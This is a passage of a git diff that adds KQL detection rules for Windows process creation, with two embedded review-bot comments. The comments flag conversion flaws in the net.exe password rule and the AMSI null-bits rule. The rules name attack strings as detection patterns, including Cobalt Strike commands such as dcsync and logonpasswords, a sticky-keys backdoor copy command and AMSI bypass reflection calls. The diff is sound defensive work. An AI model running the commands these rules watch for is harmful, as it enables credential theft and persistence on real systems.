":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/onenote_exe_execution_of_malicious_embedded_scripts.kql b/KQL/rules/windows/process_creation/onenote_exe_execution_of_malicious_embedded_scripts.kql
new file mode 100644
index 00000000..f7a4abcf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/onenote_exe_execution_of_malicious_embedded_scripts.kql
@@ -0,0 +1,13 @@
+// Title: OneNote.EXE Execution of Malicious Embedded Scripts
+// Author: @kostastsale
+// Date: 2023-02-02
+// Level: high
+// Description: Detects the execution of malicious OneNote documents that contain embedded scripts.
+// When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\exported\\" or ProcessCommandLine contains "\\onenoteofflinecache_files\\") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\onenote.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/openwith_exe_executes_specified_binary.kql b/KQL/rules/windows/process_creation/openwith_exe_executes_specified_binary.kql
new file mode 100644
index 00000000..f14437f7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/openwith_exe_executes_specified_binary.kql
@@ -0,0 +1,10 @@
+// Title: OpenWith.exe Executes Specified Binary
+// Author: Beyu Denis, oscd.community (rule), @harr0ey (idea)
+// Date: 2019-10-12
+// Level: high
+// Description: The OpenWith.exe executes other binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/c" and FolderPath endswith "\\OpenWith.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_commands.kql b/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_commands.kql
new file mode 100644
index 00000000..5405e6ca
--- /dev/null
+++ b/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_commands.kql
@@ -0,0 +1,10 @@
+// Title: Operator Bloopers Cobalt Strike Commands
+// Author: _pete_0, TheDFIRReport
+// Date: 2022-05-06
+// Level: high
+// Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, stp.1u
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "psinject" or ProcessCommandLine contains "spawnas" or ProcessCommandLine contains "make_token" or ProcessCommandLine contains "remote-exec" or ProcessCommandLine contains "rev2self" or ProcessCommandLine contains "dcsync" or ProcessCommandLine contains "logonpasswords" or ProcessCommandLine contains "execute-assembly" or ProcessCommandLine contains "getsystem") and (ProcessCommandLine startswith "cmd " or ProcessCommandLine startswith "cmd.exe" or ProcessCommandLine startswith "c:\\windows\\system32\\cmd.exe")) and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_modules.kql b/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_modules.kql
new file mode 100644
index 00000000..52be17aa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_modules.kql
@@ -0,0 +1,10 @@
+// Title: Operator Bloopers Cobalt Strike Modules
+// Author: _pete_0, TheDFIRReport
+// Date: 2022-05-06
+// Level: high
+// Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-ShareFinder" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-SMBAutoBrute" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "zerologon" or ProcessCommandLine contains "av_query") and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/outlook_enableunsafeclientmailrules_setting_enabled.kql b/KQL/rules/windows/process_creation/outlook_enableunsafeclientmailrules_setting_enabled.kql
new file mode 100644
index 00000000..49ff20b1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/outlook_enableunsafeclientmailrules_setting_enabled.kql
@@ -0,0 +1,10 @@
+// Title: Outlook EnableUnsafeClientMailRules Setting Enabled
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-12-27
+// Level: high
+// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\Outlook\\Security\\EnableUnsafeClientMailRules"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/password_provided_in_command_line_of_net_exe.kql b/KQL/rules/windows/process_creation/password_provided_in_command_line_of_net_exe.kql
new file mode 100644
index 00000000..244cfed8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/password_provided_in_command_line_of_net_exe.kql
@@ -0,0 +1,10 @@
+// Title: Password Provided In Command Line Of Net.EXE
+// Author: Tim Shelton (HAWK.IO)
+// Date: 2021-12-09
+// Level: medium
+// Description: Detects a when net.exe is called with a password in the command line
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.initial-access, attack.persistence, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1078
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/password_set_to_never_expire_via_wmi.kql b/KQL/rules/windows/process_creation/password_set_to_never_expire_via_wmi.kql
new file mode 100644
index 00000000..1c952b92
--- /dev/null
+++ b/KQL/rules/windows/process_creation/password_set_to_never_expire_via_wmi.kql
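Review bot: The password condition in the `where` clause has been flattened into independent substring tests — `ProcessCommandLine contains ":" and ProcessCommandLine contains "\\"` and `ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " "` — so the ordering that a wildcard pattern like `/USER:* ` expresses (a token following the user name, i.e. the password) is gone, and `contains " "` is already satisfied by any command line that passed the ` use ` test. As converted, the rule fires on every `net use \\server\share /USER:name` even when no password is given, which undercuts its purpose at medium severity; the trailing `not(ProcessCommandLine endswith " ")` filter does not restore the lost constraint. If the upstream Sigma selection is indeed `contains` with embedded `*` wildcards, the converter should translate those to a regex instead of splitting them, e.g. `ProcessCommandLine matches regex "(?i)/USER:[^ ]+ "` for the user/password fragment and an analogous `:[^ ]*\\\\` for the UNC fragment. The same wildcard-splitting behaviour is worth auditing across the other generated rules.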
@@ -0,0 +1,12 @@
+// Title: Password Set to Never Expire via WMI
+// Author: Daniel Koifman (KoifSec)
+// Date: 2025-07-30
+// Level: medium
+// Description: Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1047, attack.t1098
+// False Positives:
+// - Legitimate administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "useraccount" and ProcessCommandLine contains " set " and ProcessCommandLine contains "passwordexpires" and ProcessCommandLine contains "false") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pdq_deploy_remote_adminstartion_tool_execution.kql b/KQL/rules/windows/process_creation/pdq_deploy_remote_adminstartion_tool_execution.kql
new file mode 100644
index 00000000..c14a54d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pdq_deploy_remote_adminstartion_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: PDQ Deploy Remote Adminstartion Tool Execution
+// Author: frack113
+// Date: 2022-10-01
+// Level: medium
+// Description: Detect use of PDQ Deploy remote admin tool
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1072
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/perl_inline_command_execution.kql b/KQL/rules/windows/process_creation/perl_inline_command_execution.kql
new file mode 100644
index 00000000..38753a5a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/perl_inline_command_execution.kql
@@ -0,0 +1,10 @@
+// Title: Perl Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -e" and (FolderPath endswith "\\perl.exe" or ProcessVersionInfoOriginalFileName =~ "perl.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/permission_check_via_accesschk_exe.kql b/KQL/rules/windows/process_creation/permission_check_via_accesschk_exe.kql
new file mode 100644
index 00000000..7ca0e464
--- /dev/null
+++ b/KQL/rules/windows/process_creation/permission_check_via_accesschk_exe.kql
@@ -0,0 +1,12 @@
+// Title: Permission Check Via Accesschk.EXE
+// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-13
+// Level: medium
+// Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1069.001
+// False Positives:
+// - System administrator Usage
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "uwcqv " or ProcessCommandLine contains "kwsu " or ProcessCommandLine contains "qwsu " or ProcessCommandLine contains "uwdqs ") and (ProcessVersionInfoProductName endswith "AccessChk" or ProcessVersionInfoFileDescription contains "Reports effective permissions" or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe") or ProcessVersionInfoOriginalFileName =~ "accesschk.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/permission_misconfiguration_reconnaissance_via_findstr_exe.kql b/KQL/rules/windows/process_creation/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
new file mode 100644
index 00000000..3e502fc9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/permission_misconfiguration_reconnaissance_via_findstr_exe.kql
@@ -0,0 +1,11 @@
+// Title: Permission Misconfiguration Reconnaissance Via Findstr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-12
+// Level: medium
+// Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords.
+// This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\"Everyone\"" or ProcessCommandLine contains "'Everyone'" or ProcessCommandLine contains "\"BUILTIN\\\"" or ProcessCommandLine contains "'BUILTIN\\'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains "icacls " and ProcessCommandLine contains "findstr " and ProcessCommandLine contains "Everyone")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/persistence_via_sticky_key_backdoor.kql b/KQL/rules/windows/process_creation/persistence_via_sticky_key_backdoor.kql
new file mode 100644
index 00000000..589ba46e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/persistence_via_sticky_key_backdoor.kql
@@ -0,0 +1,13 @@
+// Title: Persistence Via Sticky Key Backdoor
+// Author: Sreeman
+// Date: 2020-02-18
+// Level: critical
+// Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.
+// When the sticky keys are "activated" the privilleged shell is launched.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1546.008, attack.privilege-escalation
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "/y " and ProcessCommandLine contains "C:\\windows\\system32\\cmd.exe C:\\windows\\system32\\sethc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/persistence_via_typedpaths_commandline.kql b/KQL/rules/windows/process_creation/persistence_via_typedpaths_commandline.kql
new file mode 100644
index 00000000..fc9bf38d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/persistence_via_typedpaths_commandline.kql
@@ -0,0 +1,10 @@
+// Title: Persistence Via TypedPaths - CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: medium
+// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/phishing_pattern_iso_in_archive.kql b/KQL/rules/windows/process_creation/phishing_pattern_iso_in_archive.kql
new file mode 100644
index 00000000..995ff0e8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/phishing_pattern_iso_in_archive.kql
@@ -0,0 +1,12 @@
+// Title: Phishing Pattern ISO in Archive
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-06-07
+// Level: high
+// Description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566
+// False Positives:
+// - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\isoburn.exe" or FolderPath endswith "\\PowerISO.exe" or FolderPath endswith "\\ImgBurn.exe") and (InitiatingProcessFolderPath endswith "\\Winrar.exe" or InitiatingProcessFolderPath endswith "\\7zFM.exe" or InitiatingProcessFolderPath endswith "\\peazip.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/php_inline_command_execution.kql b/KQL/rules/windows/process_creation/php_inline_command_execution.kql
new file mode 100644
index 00000000..18fd54fa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/php_inline_command_execution.kql
@@ -0,0 +1,10 @@
+// Title: Php Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -r" and (FolderPath endswith "\\php.exe" or ProcessVersionInfoOriginalFileName =~ "php.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/ping_hex_ip.kql b/KQL/rules/windows/process_creation/ping_hex_ip.kql
new file mode 100644
index 00000000..2c8c6cb8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/ping_hex_ip.kql
@@ -0,0 +1,12 @@
+// Title: Ping Hex IP
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-23
+// Level: high
+// Description: Detects a ping command that uses a hex encoded IP address
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, attack.t1027
+// False Positives:
+// - Unlikely, because no sane admin pings IP addresses in a hexadecimal form
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "0x[a-fA-F0-9]{8}" and FolderPath endswith "\\ping.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/pktmon_exe_execution.kql b/KQL/rules/windows/process_creation/pktmon_exe_execution.kql
new file mode 100644
index 00000000..e4629826
--- /dev/null
+++ b/KQL/rules/windows/process_creation/pktmon_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: PktMon.EXE Execution
+// Author: frack113
+// Date: 2022-03-17
+// Level: medium
+// Description: Detects execution of PktMon, a tool that captures network packets.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where FolderPath endswith "\\pktmon.exe" or ProcessVersionInfoOriginalFileName =~ "PktMon.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/port_forwarding_activity_via_ssh_exe.kql b/KQL/rules/windows/process_creation/port_forwarding_activity_via_ssh_exe.kql
new file mode 100644
index 00000000..cc1278d9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/port_forwarding_activity_via_ssh_exe.kql
@@ -0,0 +1,12 @@
+// Title: Port Forwarding Activity Via SSH.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-12
+// Level: medium
+// Description: Detects port forwarding activity via SSH.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.lateral-movement, attack.t1572, attack.t1021.001, attack.t1021.004
+// False Positives:
+// - Administrative activity using a remote port forwarding to a local port
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -R " or ProcessCommandLine contains " /R " or ProcessCommandLine contains " –R " or ProcessCommandLine contains " —R " or ProcessCommandLine contains " ―R ") and FolderPath endswith "\\ssh.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/portable_gpg_exe_execution.kql b/KQL/rules/windows/process_creation/portable_gpg_exe_execution.kql
new file mode 100644
index 00000000..70660e99
--- /dev/null
+++ b/KQL/rules/windows/process_creation/portable_gpg_exe_execution.kql
@@ -0,0 +1,10 @@
+// Title: Portable Gpg.EXE Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-06
+// Level: medium
+// Description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoOriginalFileName =~ "gpg.exe" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (not((FolderPath contains ":\\Program Files (x86)\\GNU\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG VS-Desktop\\" or FolderPath contains ":\\Program Files (x86)\\GnuPG\\bin\\" or FolderPath contains ":\\Program Files (x86)\\Gpg4win\\bin\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/possible_privilege_escalation_via_weak_service_permissions.kql b/KQL/rules/windows/process_creation/possible_privilege_escalation_via_weak_service_permissions.kql
new file mode 100644
index 00000000..0035caee
--- /dev/null
+++ b/KQL/rules/windows/process_creation/possible_privilege_escalation_via_weak_service_permissions.kql
@@ -0,0 +1,10 @@
+// Title: Possible Privilege Escalation via Weak Service Permissions
+// Author: Teymur Kheirkhabarov
+// Date: 2019-10-26
+// Level: high
+// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\sc.exe" and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))) and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_active_directory_enumeration_using_ad_module_proccreation.kql b/KQL/rules/windows/process_creation/potential_active_directory_enumeration_using_ad_module_proccreation.kql
new file mode 100644
index 00000000..f349e4b1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_active_directory_enumeration_using_ad_module_proccreation.kql
@@ -0,0 +1,12 @@
+// Title: Potential Active Directory Enumeration Using AD Module - ProcCreation
+// Author: frack113
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
+// MITRE Tactic: Reconnaissance
+// Tags: attack.reconnaissance, attack.discovery, attack.impact
+// False Positives:
+// - Legitimate use of the library for administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_adplus_exe_abuse.kql b/KQL/rules/windows/process_creation/potential_adplus_exe_abuse.kql
new file mode 100644
index 00000000..13d64694
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_adplus_exe_abuse.kql
@@ -0,0 +1,12 @@
+// Title: Potential Adplus.EXE Abuse
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-09
+// Level: high
+// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.credential-access, attack.t1003.001
+// False Positives:
+// - Legitimate usage of Adplus for debugging purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_amazon_ssm_agent_hijacking.kql b/KQL/rules/windows/process_creation/potential_amazon_ssm_agent_hijacking.kql
new file mode 100644
index 00000000..4348ae16
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_amazon_ssm_agent_hijacking.kql
@@ -0,0 +1,12 @@
+// Title: Potential Amazon SSM Agent Hijacking
+// Author: Muhammad Faisal
+// Date: 2023-08-02
+// Level: medium
+// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.persistence, attack.t1219.002
+// False Positives:
+// - Legitimate activity of system administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "\\amazon-ssm-agent.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_amsi_bypass_using_null_bits.kql b/KQL/rules/windows/process_creation/potential_amsi_bypass_using_null_bits.kql
new file mode 100644
index 00000000..ba5a1327
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_amsi_bypass_using_null_bits.kql
@@ -0,0 +1,10 @@
+// Title: Potential AMSI Bypass Using NULL Bits
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-04
+// Level: medium
+// Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "if(0){{{0}}}' -f $(0 -as [char]) +" or ProcessCommandLine contains "#"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_amsi_bypass_via_net_reflection.kql b/KQL/rules/windows/process_creation/potential_amsi_bypass_via_net_reflection.kql
new file mode 100644
index 00000000..941c62c3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_amsi_bypass_via_net_reflection.kql
@@ -0,0 +1,12 @@
+// Title: Potential AMSI Bypass Via .NET Reflection
+// Author: Markus Neis, @Kostastsale
+// Date: 2018-08-17
+// Level: high
+// Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "System.Management.Automation.AmsiUtils" and ProcessCommandLine contains "amsiInitFailed") or (ProcessCommandLine contains "[Ref].Assembly.GetType" and ProcessCommandLine contains "SetValue($null,$true)" and ProcessCommandLine contains "NonPublic,Static")
\ No newline at end of file
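Review bot: The second clause of the `| where` line in potential_amsi_bypass_using_null_bits.kql, `ProcessCommandLine contains "#"`, matches every process creation whose command line contains a `#` character (PowerShell comments, URL fragments, colour codes), so this rule will page on a large share of ordinary events and bury the first, specific pattern. The source rule's second value presumably carried a non-printable byte after the `#` that the converter did not serialise, leaving only the bare character; this is worth confirming against the upstream YAML. Until the converter can emit that byte faithfully, e.g. `ProcessCommandLine contains "#\u0000"` if the ingestion pipeline preserves it, the clause should be dropped or the rule skipped rather than shipped with a one-character match. It would also help to have the converter flag any generated `contains` value shorter than two or three characters, since the same failure mode will recur elsewhere.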
diff --git a/KQL/rules/windows/process_creation/potential_application_whitelisting_bypass_via_dnx_exe.kql b/KQL/rules/windows/process_creation/potential_application_whitelisting_bypass_via_dnx_exe.kql
new file mode 100644
index 00000000..fcd1f49d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_application_whitelisting_bypass_via_dnx_exe.kql
@@ -0,0 +1,13 @@
+// Title: Potential Application Whitelisting Bypass via Dnx.EXE
+// Author: Beyu Denis, oscd.community
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.
+// Attackers might abuse this in order to bypass application whitelisting.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.t1027.004
+// False Positives:
+// - Legitimate use of dnx.exe by legitimate user
+
+DeviceProcessEvents
+| where FolderPath endswith "\\dnx.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_arbitrary_code_execution_via_node_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_code_execution_via_node_exe.kql
new file mode 100644
index 00000000..d951c614
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_arbitrary_code_execution_via_node_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Arbitrary Code Execution Via Node.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --eval ") and FolderPath endswith "\\node.exe") and (ProcessCommandLine contains ".exec(" and ProcessCommandLine contains "net.socket" and ProcessCommandLine contains ".connect" and ProcessCommandLine contains "child_process")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_using_msdt_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_using_msdt_exe.kql
new file mode 100644
index 00000000..1af58858
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_using_msdt_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Arbitrary Command Execution Using Msdt.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-29
+// Level: high
+// Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (ProcessCommandLine contains "IT_BrowseForFile=" or (ProcessCommandLine contains " PCWDiagnostic" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af " or ProcessCommandLine contains " –af " or ProcessCommandLine contains " —af " or ProcessCommandLine contains " ―af ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_via_ftp_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_via_ftp_exe.kql
new file mode 100644
index 00000000..a225d904
--- /dev/null
